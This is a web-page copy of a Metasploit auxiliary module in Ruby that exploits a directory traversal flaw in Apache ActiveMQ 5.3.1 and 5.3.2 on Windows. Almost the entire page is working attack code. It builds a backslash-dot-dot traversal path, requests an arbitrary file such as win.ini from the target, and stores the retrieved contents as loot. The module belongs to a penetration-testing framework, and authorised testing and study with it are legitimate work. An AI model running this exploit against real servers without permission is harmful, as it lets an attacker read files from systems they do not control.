Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/http/apache_activemq_traversal.rb
19664 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::HttpClient
8
include Msf::Auxiliary::Report
9
include Msf::Auxiliary::Scanner
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Apache ActiveMQ Directory Traversal',
16
'Description' => %q{
17
This module exploits a directory traversal vulnerability in Apache ActiveMQ
18
5.3.1 and 5.3.2 on Windows systems. The vulnerability exists in the Jetty's
19
ResourceHandler installed with the affected versions. This module has been tested
20
successfully on ActiveMQ 5.3.1 and 5.3.2 over Windows 2003 SP2.
21
},
22
'License' => MSF_LICENSE,
23
'Author' => [
24
'AbdulAziz Hariri', # Vulnerability discovery
25
'juan vazquez' # Metasploit module
26
],
27
'References' => [
28
[ 'OSVDB', '86401' ],
29
[ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=895' ],
30
[ 'URL', 'https://issues.apache.org/jira/browse/amq-2788' ]
31
],
32
'Notes' => {
33
'Reliability' => UNKNOWN_RELIABILITY,
34
'Stability' => UNKNOWN_STABILITY,
35
'SideEffects' => UNKNOWN_SIDE_EFFECTS
36
}
37
)
38
)
39
40
register_options(
41
[
42
Opt::RPORT(8161),
43
OptString.new('FILEPATH', [true, 'The name of the file to download', '/windows\\win.ini']),
44
OptInt.new('DEPTH', [false, 'Traversal depth if absolute is set to false', 4])
45
]
46
)
47
end
48
49
def run_host(ip)
50
# No point to continue if no filename is specified
51
if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
52
print_error("#{rhost}:#{rport} - Please supply FILEPATH")
53
return
54
end
55
56
travs = "/\\.." * (datastore['DEPTH'] || 1)
57
travs << "/" unless datastore['FILEPATH'][0] == "\\" or datastore['FILEPATH'][0] == "/"
58
travs << datastore['FILEPATH']
59
60
print_status("#{rhost}:#{rport} - Sending request...")
61
res = send_request_cgi({
62
'uri' => travs,
63
'method' => 'GET',
64
})
65
66
if res and res.code == 200
67
contents = res.body
68
fname = File.basename(datastore['FILEPATH'])
69
path = store_loot(
70
'apache.activemq',
71
'application/octet-stream',
72
ip,
73
contents,
74
fname
75
)
76
print_status("#{rhost}:#{rport} - File saved in: #{path}")
77
else
78
print_error("#{rhost}:#{rport} - Failed to retrieve file")
79
return
80
end
81
end
82
end
83
84